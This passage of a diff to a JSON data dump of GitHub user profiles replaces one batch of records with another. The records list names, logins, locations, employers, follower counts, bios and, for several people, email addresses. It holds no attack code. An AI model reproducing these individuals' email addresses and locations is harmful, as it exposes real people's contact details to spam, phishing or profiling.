"2024-09-11T23:41:49.260Z", - "name": "Sean Nguyen", - "login": "snooyen", - "email": "sean@bright.ai", - "avatar_url": "https://avatars.githubusercontent.com/u/5706159?v=4", - "company": "@BrightDotAi", - "location": "Santa Barbara, California", + "nest_created_at": "2024-09-22T07:48:19.730Z", + "nest_updated_at": "2024-09-22T18:50:53.145Z", + "name": "Gregor Jasny", + "login": "gjasny", + "email": "gjasny@googlemail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1165598?v=4", + "company": "", + "location": "Dresden", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 1, - "public_repositories_count": 16, - "created_at": "2013-10-17T03:58:25Z", - "updated_at": "2024-05-02T15:29:28Z", - "node_id": "MDQ6VXNlcjU3MDYxNTk=", + "following_count": 2, + "followers_count": 37, + "public_gists_count": 11, + "public_repositories_count": 131, + "created_at": "2011-11-01T19:04:30Z", + "updated_at": "2024-09-19T07:30:35Z", + "node_id": "MDQ6VXNlcjExNjU1OTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398303,24 +656177,24 @@ }, { "model": "github.user", - "pk": 1523, + "pk": 6811, "fields": { - "nest_created_at": "2024-09-11T23:41:50.108Z", - "nest_updated_at": "2024-09-11T23:41:50.108Z", - "name": "Jörg Arndt", - "login": "Joerki", + "nest_created_at": "2024-09-22T07:48:20.043Z", + "nest_updated_at": "2024-09-22T18:50:53.466Z", + "name": "Guillaume Humbert", + "login": "acidoxee", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2178313?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/23697296?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 3, + "followers_count": 27, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2012-08-19T11:22:55Z", - "updated_at": "2024-07-22T07:48:57Z", - "node_id": "MDQ6VXNlcjIxNzgzMTM=", + "public_repositories_count": 1, + "created_at": "2016-11-23T09:55:42Z", + "updated_at": "2024-09-12T14:39:59Z", + "node_id": "MDQ6VXNlcjIzNjk3Mjk2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398328,24 +656202,24 @@ }, { "model": "github.user", - "pk": 1524, + "pk": 6812, "fields": { - "nest_created_at": "2024-09-11T23:41:50.909Z", - "nest_updated_at": "2024-09-12T01:37:07.481Z", - "name": "", - "login": "macariem", + "nest_created_at": "2024-09-22T07:48:20.354Z", + "nest_updated_at": "2024-09-22T18:50:53.782Z", + "name": "Guilliam Xavier", + "login": "guilliamxavier", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/150916824?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7404452?v=4", "company": "", - "location": "", + "location": "France", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-11-15T11:45:11Z", - "updated_at": "2024-09-10T07:39:01Z", - "node_id": "U_kgDOCP7O2A", + "public_repositories_count": 5, + "created_at": "2014-04-25T10:25:20Z", + "updated_at": "2024-04-12T13:47:04Z", + "node_id": "MDQ6VXNlcjc0MDQ0NTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398353,49 +656227,49 @@ }, { "model": "github.user", - "pk": 1525, + "pk": 6813, "fields": { - "nest_created_at": "2024-09-11T23:42:07.233Z", - "nest_updated_at": "2024-09-11T23:42:07.233Z", - "name": "Gareth Rushgrove", - "login": "garethr", - "email": "gareth@morethanseven.net", - "avatar_url": "https://avatars.githubusercontent.com/u/2029?v=4", - "company": "@snyk ", - "location": "Cambridge", + "nest_created_at": "2024-09-22T07:48:20.662Z", + "nest_updated_at": "2024-09-22T18:50:54.214Z", + "name": "Hafiz ", + "login": "zifahm", + "email": "muhamm3dhafiz@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3761062?v=4", + "company": "", + "location": "Dubai", "collaborators_count": 0, - "following_count": 11, - "followers_count": 871, - "public_gists_count": 80, - "public_repositories_count": 293, - "created_at": "2008-03-03T16:49:25Z", - "updated_at": "2024-01-04T08:15:35Z", - "node_id": "MDQ6VXNlcjIwMjk=", - "bio": "", + "following_count": 14, + "followers_count": 25, + "public_gists_count": 5, + "public_repositories_count": 46, + "created_at": "2013-03-04T05:20:22Z", + "updated_at": "2024-09-22T10:11:31Z", + "node_id": "MDQ6VXNlcjM3NjEwNjI=", + "bio": "Graphql | React | Typescirpt \r\nI do a little bit of Youtube as well\r\n", "is_hireable": false, - "twitter_username": "" + "twitter_username": "zifahm1" } }, { "model": "github.user", - "pk": 1526, + "pk": 6814, "fields": { - "nest_created_at": "2024-09-11T23:42:09.308Z", - "nest_updated_at": "2024-09-11T23:42:09.308Z", - "name": "Jeffry Hesse", - "login": "DarthHater", + "nest_created_at": "2024-09-22T07:48:20.972Z", + "nest_updated_at": "2024-09-22T18:50:54.520Z", + "name": "hexchain", + "login": "hexchain", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5544326?v=4", - "company": "@sonatype ", - "location": "Talkeetna, Alaska", + "avatar_url": "https://avatars.githubusercontent.com/u/529520?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 50, - "followers_count": 61, - "public_gists_count": 1, - "public_repositories_count": 72, - "created_at": "2013-09-25T20:08:39Z", - "updated_at": "2023-12-27T19:26:13Z", - "node_id": "MDQ6VXNlcjU1NDQzMjY=", + "following_count": 56, + "followers_count": 145, + "public_gists_count": 4, + "public_repositories_count": 48, + "created_at": "2010-12-19T15:50:51Z", + "updated_at": "2024-09-16T09:53:55Z", + "node_id": "MDQ6VXNlcjUyOTUyMA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398403,49 +656277,49 @@ }, { "model": "github.user", - "pk": 1527, + "pk": 6815, "fields": { - "nest_created_at": "2024-09-11T23:42:11.407Z", - "nest_updated_at": "2024-09-11T23:42:11.407Z", - "name": "Thomas Graf", - "login": "tngraf", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1225388?v=4", - "company": "Siemens", - "location": "Karlsruhe, Germany", + "nest_created_at": "2024-09-22T07:48:21.300Z", + "nest_updated_at": "2024-09-22T18:50:54.828Z", + "name": "Harminder Virk", + "login": "thetutlage", + "email": "virk@adonisjs.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1706381?v=4", + "company": "", + "location": "India", "collaborators_count": 0, - "following_count": 1, - "followers_count": 13, - "public_gists_count": 0, - "public_repositories_count": 36, - "created_at": "2011-11-28T13:39:55Z", - "updated_at": "2024-09-06T11:25:29Z", - "node_id": "MDQ6VXNlcjEyMjUzODg=", - "bio": "Developer, architect, principal open source license compliance expert", + "following_count": 2, + "followers_count": 2397, + "public_gists_count": 40, + "public_repositories_count": 262, + "created_at": "2012-05-04T16:10:31Z", + "updated_at": "2024-09-15T16:21:49Z", + "node_id": "MDQ6VXNlcjE3MDYzODE=", + "bio": "\r\n I write code\r\n", "is_hireable": false, - "twitter_username": "" + "twitter_username": "AmanVirk1" } }, { "model": "github.user", - "pk": 1528, + "pk": 6816, "fields": { - "nest_created_at": "2024-09-11T23:42:13.993Z", - "nest_updated_at": "2024-09-12T01:26:37.245Z", - "name": "Taras Ivashchenko", - "login": "oxdef", - "email": "oxdef@oxdef.info", - "avatar_url": "https://avatars.githubusercontent.com/u/3337518?v=4", - "company": "@woltapp", - "location": "Berlin, Germany", + "nest_created_at": "2024-09-22T07:48:21.613Z", + "nest_updated_at": "2024-09-22T18:50:55.141Z", + "name": "Hasib Hassan", + "login": "hasibhassan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/67892792?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 27, - "followers_count": 40, - "public_gists_count": 1, - "public_repositories_count": 9, - "created_at": "2013-01-22T09:44:06Z", - "updated_at": "2024-07-06T18:52:32Z", - "node_id": "MDQ6VXNlcjMzMzc1MTg=", + "following_count": 87, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2020-07-06T06:39:00Z", + "updated_at": "2024-08-28T12:47:05Z", + "node_id": "MDQ6VXNlcjY3ODkyNzky", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398453,74 +656327,74 @@ }, { "model": "github.user", - "pk": 1529, + "pk": 6817, "fields": { - "nest_created_at": "2024-09-11T23:42:16.458Z", - "nest_updated_at": "2024-09-11T23:42:16.458Z", - "name": "Joubin Jabbari", - "login": "joubin", - "email": "joubin@linux.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1058767?v=4", - "company": "@ucdavis @Silentgen @OWASP @threatspec ", - "location": "San Francisco, CA", + "nest_created_at": "2024-09-22T07:48:21.961Z", + "nest_updated_at": "2024-09-22T18:50:55.455Z", + "name": "h-wata", + "login": "h-wata", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20681658?v=4", + "company": "", + "location": "Tokyo", "collaborators_count": 0, - "following_count": 11, - "followers_count": 31, - "public_gists_count": 23, - "public_repositories_count": 107, - "created_at": "2011-09-17T19:43:56Z", - "updated_at": "2024-08-28T11:22:26Z", - "node_id": "MDQ6VXNlcjEwNTg3Njc=", + "following_count": 6, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 50, + "created_at": "2016-07-27T11:23:10Z", + "updated_at": "2024-09-18T05:41:40Z", + "node_id": "MDQ6VXNlcjIwNjgxNjU4", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1530, + "pk": 6818, "fields": { - "nest_created_at": "2024-09-11T23:42:19.408Z", - "nest_updated_at": "2024-09-11T23:42:19.408Z", - "name": "", - "login": "CodingVoid", - "email": "maximilian.brune@9elements.com", - "avatar_url": "https://avatars.githubusercontent.com/u/36151481?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:22.276Z", + "nest_updated_at": "2024-09-22T18:50:55.772Z", + "name": "Hywel Rees", + "login": "hjr555", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5008913?v=4", + "company": "https://www.linkedin.com/company/65856164/admin/", + "location": "UK", "collaborators_count": 0, - "following_count": 4, - "followers_count": 6, + "following_count": 15, + "followers_count": 10, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2018-02-05T08:19:11Z", - "updated_at": "2024-09-08T18:11:57Z", - "node_id": "MDQ6VXNlcjM2MTUxNDgx", - "bio": "", - "is_hireable": false, + "public_repositories_count": 63, + "created_at": "2013-07-14T22:34:47Z", + "updated_at": "2024-08-18T17:41:13Z", + "node_id": "MDQ6VXNlcjUwMDg5MTM=", + "bio": "Perpetually learning f̶u̶l̶l̶-̶s̶t̶a̶c̶k̶ developer.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1531, + "pk": 6819, "fields": { - "nest_created_at": "2024-09-11T23:42:20.625Z", - "nest_updated_at": "2024-09-11T23:42:20.625Z", - "name": "", - "login": "Radial01", + "nest_created_at": "2024-09-22T07:48:22.583Z", + "nest_updated_at": "2024-09-22T18:50:56.085Z", + "name": "IT Lackey", + "login": "itlackey", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50110449?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6414031?v=4", + "company": "Washington University in St. Louis", + "location": "St. Louis", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2019-04-29T14:24:56Z", - "updated_at": "2024-08-01T13:39:51Z", - "node_id": "MDQ6VXNlcjUwMTEwNDQ5", + "following_count": 21, + "followers_count": 17, + "public_gists_count": 8, + "public_repositories_count": 47, + "created_at": "2014-01-15T22:04:37Z", + "updated_at": "2024-08-13T16:24:47Z", + "node_id": "MDQ6VXNlcjY0MTQwMzE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398528,74 +656402,74 @@ }, { "model": "github.user", - "pk": 1532, + "pk": 6820, "fields": { - "nest_created_at": "2024-09-11T23:42:24.352Z", - "nest_updated_at": "2024-09-11T23:42:24.352Z", - "name": "Cookie Engineer", - "login": "cookiengineer", + "nest_created_at": "2024-09-22T07:48:22.895Z", + "nest_updated_at": "2024-09-22T18:50:56.444Z", + "name": "Ivan Dimitrov", + "login": "IvanBorislavovDimitrov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/592637?v=4", - "company": "@tholian-network", - "location": "Heidelberg, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/32311354?v=4", + "company": "SAP", + "location": "Sofia, Bulgaria", "collaborators_count": 0, - "following_count": 55, - "followers_count": 491, - "public_gists_count": 10, - "public_repositories_count": 32, - "created_at": "2011-01-31T12:11:46Z", - "updated_at": "2024-08-29T05:08:22Z", - "node_id": "MDQ6VXNlcjU5MjYzNw==", - "bio": "Building a peer-to-peer AI-driven Cyber Defense network to fight off certain cyber-terrorist threat actors.", + "following_count": 30, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 50, + "created_at": "2017-09-26T20:01:49Z", + "updated_at": "2024-09-21T21:52:31Z", + "node_id": "MDQ6VXNlcjMyMzExMzU0", + "bio": "Graduate student at the Technical University of Sofia, Bulgaria (Software Engineering).", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1533, + "pk": 6821, "fields": { - "nest_created_at": "2024-09-11T23:42:25.163Z", - "nest_updated_at": "2024-09-11T23:42:25.163Z", - "name": "Nemo", - "login": "captn3m0", - "email": "github.contact@captnemo.in", - "avatar_url": "https://avatars.githubusercontent.com/u/584253?v=4", - "company": "", - "location": "Bangalore, India", + "nest_created_at": "2024-09-22T07:48:23.200Z", + "nest_updated_at": "2024-09-22T18:50:56.784Z", + "name": "Ivan Gabriele", + "login": "ivangabriele", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5957876?v=4", + "company": "@betagouv", + "location": "Paris", "collaborators_count": 0, - "following_count": 780, - "followers_count": 1806, - "public_gists_count": 80, - "public_repositories_count": 437, - "created_at": "2011-01-26T08:56:27Z", - "updated_at": "2024-09-03T10:43:19Z", - "node_id": "MDQ6VXNlcjU4NDI1Mw==", - "bio": "Making and Breaking things, sometimes intentionally", + "following_count": 57, + "followers_count": 114, + "public_gists_count": 19, + "public_repositories_count": 71, + "created_at": "2013-11-16T22:35:34Z", + "updated_at": "2024-09-13T15:37:23Z", + "node_id": "MDQ6VXNlcjU5NTc4NzY=", + "bio": "Passionate about everything.", "is_hireable": false, - "twitter_username": "captn3m0" + "twitter_username": "ivan_gabriele" } }, { "model": "github.user", - "pk": 1534, + "pk": 6822, "fields": { - "nest_created_at": "2024-09-11T23:42:25.996Z", - "nest_updated_at": "2024-09-11T23:42:25.996Z", - "name": "", - "login": "jheck88", + "nest_created_at": "2024-09-22T07:48:23.522Z", + "nest_updated_at": "2024-09-22T18:50:57.106Z", + "name": "Jad El Kik", + "login": "jadkik", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10718570?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1541108?v=4", + "company": "Aiven", + "location": "Berlin, DE", "collaborators_count": 0, - "following_count": 0, - "followers_count": 7, - "public_gists_count": 2, + "following_count": 2, + "followers_count": 13, + "public_gists_count": 4, "public_repositories_count": 19, - "created_at": "2015-01-27T02:27:47Z", - "updated_at": "2023-07-17T19:10:20Z", - "node_id": "MDQ6VXNlcjEwNzE4NTcw", + "created_at": "2012-03-15T16:36:24Z", + "updated_at": "2024-09-10T12:09:24Z", + "node_id": "MDQ6VXNlcjE1NDExMDg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398603,74 +656477,74 @@ }, { "model": "github.user", - "pk": 1535, + "pk": 6823, "fields": { - "nest_created_at": "2024-09-11T23:42:26.829Z", - "nest_updated_at": "2024-09-11T23:42:26.829Z", - "name": "Jeff Williams", - "login": "planetlevel", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2704076?v=4", - "company": "Contrast Security", - "location": "Baltimore, MD", + "nest_created_at": "2024-09-22T07:48:23.831Z", + "nest_updated_at": "2024-09-22T18:50:57.439Z", + "name": "James Hare", + "login": "harej", + "email": "jamesmhare@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/150027?v=4", + "company": "@scatter-llc ", + "location": "Portland, OR", "collaborators_count": 0, "following_count": 5, - "followers_count": 42, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2012-11-02T03:23:24Z", - "updated_at": "2024-09-04T11:21:45Z", - "node_id": "MDQ6VXNlcjI3MDQwNzY=", - "bio": "https://www.linkedin.com/in/planetlevel/", + "followers_count": 33, + "public_gists_count": 13, + "public_repositories_count": 40, + "created_at": "2009-11-07T05:57:21Z", + "updated_at": "2024-09-04T22:49:11Z", + "node_id": "MDQ6VXNlcjE1MDAyNw==", + "bio": "Knowledge graph engineer", "is_hireable": false, - "twitter_username": "planetlevel" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1536, + "pk": 6824, "fields": { - "nest_created_at": "2024-09-11T23:42:34.278Z", - "nest_updated_at": "2024-09-11T23:42:34.278Z", - "name": "John Andersen", - "login": "pdxjohnny", - "email": "john.s.andersen@intel.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5950433?v=4", - "company": "@intel", - "location": "Portland", + "nest_created_at": "2024-09-22T07:48:24.147Z", + "nest_updated_at": "2024-09-22T18:50:57.756Z", + "name": "James Hegedus", + "login": "jthegedus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20798510?v=4", + "company": "", + "location": "Australia", "collaborators_count": 0, - "following_count": 120, - "followers_count": 145, - "public_gists_count": 235, - "public_repositories_count": 277, - "created_at": "2013-11-15T18:35:37Z", - "updated_at": "2024-09-05T23:58:49Z", - "node_id": "MDQ6VXNlcjU5NTA0MzM=", - "bio": "🎩 Insania Vocat Ad Te 🐰🕳️\r\nJohn 1:23 Rev 22:17 Luke 8:17 Matt 13:10-16, 6:24\r\nDecentralize the means of production. Opinions expressed via account my are own", + "following_count": 388, + "followers_count": 260, + "public_gists_count": 46, + "public_repositories_count": 45, + "created_at": "2016-08-02T15:56:35Z", + "updated_at": "2024-09-08T07:06:54Z", + "node_id": "MDQ6VXNlcjIwNzk4NTEw", + "bio": "Fan of:\r\n@vlang\r\n@golang\r\n@GoogleCloudPlatform\r\n@firebase\r\n@cloudflare\r\n@denoland\r\n@sveltejs", "is_hireable": false, - "twitter_username": "" + "twitter_username": "jthegedus" } }, { "model": "github.user", - "pk": 1537, + "pk": 6825, "fields": { - "nest_created_at": "2024-09-11T23:42:35.093Z", - "nest_updated_at": "2024-09-11T23:42:35.093Z", - "name": "", - "login": "howardj99", + "nest_created_at": "2024-09-22T07:48:24.460Z", + "nest_updated_at": "2024-09-22T18:50:58.095Z", + "name": "James Jensen", + "login": "j2jensen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23319481?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/453495?v=4", "company": "", - "location": "", + "location": "Salt Lake City, UT", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2016-11-07T17:59:50Z", - "updated_at": "2024-07-11T21:35:18Z", - "node_id": "MDQ6VXNlcjIzMzE5NDgx", + "followers_count": 3, + "public_gists_count": 7, + "public_repositories_count": 25, + "created_at": "2010-10-25T19:00:33Z", + "updated_at": "2024-08-02T04:40:01Z", + "node_id": "MDQ6VXNlcjQ1MzQ5NQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398678,124 +656552,124 @@ }, { "model": "github.user", - "pk": 1538, + "pk": 6826, "fields": { - "nest_created_at": "2024-09-11T23:42:39.255Z", - "nest_updated_at": "2024-09-11T23:42:39.255Z", - "name": "Eliot Lear", - "login": "elear", + "nest_created_at": "2024-09-22T07:48:24.766Z", + "nest_updated_at": "2024-09-22T18:50:58.409Z", + "name": "James Newton-King", + "login": "JamesNK", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1016623?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/303201?v=4", + "company": "Microsoft", + "location": "Singapore", "collaborators_count": 0, "following_count": 0, - "followers_count": 19, - "public_gists_count": 0, - "public_repositories_count": 42, - "created_at": "2011-08-31T10:28:52Z", - "updated_at": "2024-08-31T13:10:37Z", - "node_id": "MDQ6VXNlcjEwMTY2MjM=", - "bio": "IoT scaredy cat. Jack of all CS trades, and master of none.\r\n", + "followers_count": 4130, + "public_gists_count": 18, + "public_repositories_count": 72, + "created_at": "2010-06-11T23:08:02Z", + "updated_at": "2024-09-13T11:31:25Z", + "node_id": "MDQ6VXNlcjMwMzIwMQ==", + "bio": "Software Developer. Author of Json.NET. Not Batman.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1539, + "pk": 6827, "fields": { - "nest_created_at": "2024-09-11T23:42:40.429Z", - "nest_updated_at": "2024-09-11T23:42:40.429Z", - "name": "Dcentrica", - "login": "dcentrica", + "nest_created_at": "2024-09-22T07:48:25.077Z", + "nest_updated_at": "2024-09-22T18:50:58.733Z", + "name": "Jamie Magee", + "login": "JamieMagee", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/40150397?v=4", - "company": "Dcentrica", - "location": "New Zealand", + "avatar_url": "https://avatars.githubusercontent.com/u/1358764?v=4", + "company": "@Microsoft", + "location": "Seattle", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 3, - "public_repositories_count": 21, - "created_at": "2018-06-10T20:12:33Z", - "updated_at": "2024-07-19T22:27:08Z", - "node_id": "MDQ6VXNlcjQwMTUwMzk3", - "bio": "Decentralised systems for a centralised world.", - "is_hireable": true, - "twitter_username": "" + "following_count": 145, + "followers_count": 287, + "public_gists_count": 49, + "public_repositories_count": 236, + "created_at": "2012-01-20T15:39:56Z", + "updated_at": "2024-09-18T11:22:50Z", + "node_id": "MDQ6VXNlcjEzNTg3NjQ=", + "bio": "Programmer, Engineer, Problem Solver. Senior Software Engineer @Microsoft / @github", + "is_hireable": false, + "twitter_username": "Jamie_Magee" } }, { "model": "github.user", - "pk": 1540, + "pk": 6828, "fields": { - "nest_created_at": "2024-09-12T00:07:23.465Z", - "nest_updated_at": "2024-09-12T00:07:23.465Z", - "name": "Adam Cmiel", - "login": "chmeliik", - "email": "acmiel@redhat.com", - "avatar_url": "https://avatars.githubusercontent.com/u/38193343?v=4", + "nest_created_at": "2024-09-22T07:48:25.388Z", + "nest_updated_at": "2024-09-22T18:50:59.046Z", + "name": "Paul Soporan", + "login": "paul-soporan", + "email": "paul.soporan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/32596136?v=4", "company": "", - "location": "", + "location": "Timisoara, Romania", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 7, - "public_repositories_count": 85, - "created_at": "2018-04-08T22:00:32Z", - "updated_at": "2024-07-19T12:05:24Z", - "node_id": "MDQ6VXNlcjM4MTkzMzQz", - "bio": "", + "following_count": 1, + "followers_count": 30, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2017-10-07T14:22:02Z", + "updated_at": "2024-09-22T13:14:08Z", + "node_id": "MDQ6VXNlcjMyNTk2MTM2", + "bio": "Working on @yarnpkg.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "paul_soporan" } }, { "model": "github.user", - "pk": 1541, + "pk": 6829, "fields": { - "nest_created_at": "2024-09-12T00:07:24.319Z", - "nest_updated_at": "2024-09-12T01:36:55.404Z", - "name": "Marlon Pina Tojal", - "login": "fnxpt", + "nest_created_at": "2024-09-22T07:48:25.704Z", + "nest_updated_at": "2024-09-22T18:50:59.360Z", + "name": "Naman Goel", + "login": "nmn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1815240?v=4", - "company": "Backbase", - "location": "Amsterdam, The Netherlands", + "avatar_url": "https://avatars.githubusercontent.com/u/3582514?v=4", + "company": "Facebook", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 2, - "followers_count": 15, - "public_gists_count": 2, - "public_repositories_count": 106, - "created_at": "2012-06-04T13:36:22Z", - "updated_at": "2024-08-14T11:20:14Z", - "node_id": "MDQ6VXNlcjE4MTUyNDA=", + "following_count": 6, + "followers_count": 639, + "public_gists_count": 20, + "public_repositories_count": 186, + "created_at": "2013-02-13T08:44:28Z", + "updated_at": "2024-09-16T20:08:39Z", + "node_id": "MDQ6VXNlcjM1ODI1MTQ=", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1542, + "pk": 6830, "fields": { - "nest_created_at": "2024-09-12T00:07:41.816Z", - "nest_updated_at": "2024-09-12T00:07:54.274Z", - "name": "Daniel B", - "login": "bardenstein", + "nest_created_at": "2024-09-22T07:48:26.022Z", + "nest_updated_at": "2024-09-22T18:50:59.660Z", + "name": "N. van Oosten", + "login": "NickEastNL", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/862262?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8384282?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2011-06-20T17:21:52Z", - "updated_at": "2023-12-06T01:10:47Z", - "node_id": "MDQ6VXNlcjg2MjI2Mg==", + "public_repositories_count": 9, + "created_at": "2014-08-07T11:23:50Z", + "updated_at": "2024-09-22T08:57:46Z", + "node_id": "MDQ6VXNlcjgzODQyODI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398803,24 +656677,24 @@ }, { "model": "github.user", - "pk": 1543, + "pk": 6831, "fields": { - "nest_created_at": "2024-09-12T00:07:44.336Z", - "nest_updated_at": "2024-09-12T00:07:44.336Z", - "name": "", - "login": "bhermida", + "nest_created_at": "2024-09-22T07:48:26.341Z", + "nest_updated_at": "2024-09-22T18:50:59.964Z", + "name": "Morgan Zolob", + "login": "mogzol", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/143737534?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/11789801?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-08-31T16:16:20Z", - "updated_at": "2023-08-31T16:16:20Z", - "node_id": "U_kgDOCJFCvg", + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 27, + "created_at": "2015-04-03T19:42:21Z", + "updated_at": "2024-08-25T01:09:03Z", + "node_id": "MDQ6VXNlcjExNzg5ODAx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -398828,249 +656702,249 @@ }, { "model": "github.user", - "pk": 1544, + "pk": 6832, "fields": { - "nest_created_at": "2024-09-12T00:07:50.943Z", - "nest_updated_at": "2024-09-12T00:07:50.943Z", - "name": "NickVido", - "login": "nickvido", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/676027?v=4", - "company": "Finite State", - "location": "Columbus, OH", + "nest_created_at": "2024-09-22T07:48:26.656Z", + "nest_updated_at": "2024-09-22T18:51:00.273Z", + "name": "Moody Salem", + "login": "moodysalem", + "email": "moody@ekubo.org", + "avatar_url": "https://avatars.githubusercontent.com/u/7897876?v=4", + "company": "@EkuboProtocol ", + "location": "Miami", "collaborators_count": 0, - "following_count": 114, - "followers_count": 32, - "public_gists_count": 0, - "public_repositories_count": 31, - "created_at": "2011-03-17T21:58:49Z", - "updated_at": "2024-08-06T01:35:18Z", - "node_id": "MDQ6VXNlcjY3NjAyNw==", - "bio": "", + "following_count": 107, + "followers_count": 1322, + "public_gists_count": 17, + "public_repositories_count": 42, + "created_at": "2014-06-16T02:36:14Z", + "updated_at": "2024-07-22T12:10:48Z", + "node_id": "MDQ6VXNlcjc4OTc4NzY=", + "bio": "Building @EkuboProtocol ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "sendmoodz" } }, { "model": "github.user", - "pk": 1545, + "pk": 6833, "fields": { - "nest_created_at": "2024-09-12T00:07:59.288Z", - "nest_updated_at": "2024-09-12T00:07:59.288Z", - "name": "Moritz Marseu", - "login": "mmarseu", - "email": "moritz.marseu@festo.com", - "avatar_url": "https://avatars.githubusercontent.com/u/47556460?v=4", - "company": "Festo Didactic SE", - "location": "Germany", + "nest_created_at": "2024-09-22T07:48:26.963Z", + "nest_updated_at": "2024-09-22T18:51:00.597Z", + "name": "Moody Saada", + "login": "agolomoodysaada", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29459870?v=4", + "company": "Agolo", + "location": "NY", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2019-02-12T09:02:22Z", - "updated_at": "2024-09-09T06:32:13Z", - "node_id": "MDQ6VXNlcjQ3NTU2NDYw", - "bio": "", + "following_count": 29, + "followers_count": 8, + "public_gists_count": 2, + "public_repositories_count": 13, + "created_at": "2017-06-15T14:46:34Z", + "updated_at": "2019-11-04T10:05:28Z", + "node_id": "MDQ6VXNlcjI5NDU5ODcw", + "bio": "🏃🏼🏃🏼🏃🏼\r\n\r\n@saada <--- the real me", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1546, + "pk": 6834, "fields": { - "nest_created_at": "2024-09-12T00:08:01.757Z", - "nest_updated_at": "2024-09-12T00:08:01.757Z", - "name": "Ben Spiller", - "login": "ben-sag", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/84027153?v=4", - "company": "", - "location": "UK", + "nest_created_at": "2024-09-22T07:48:27.317Z", + "nest_updated_at": "2024-09-22T18:51:00.915Z", + "name": "Minko Gechev", + "login": "mgechev", + 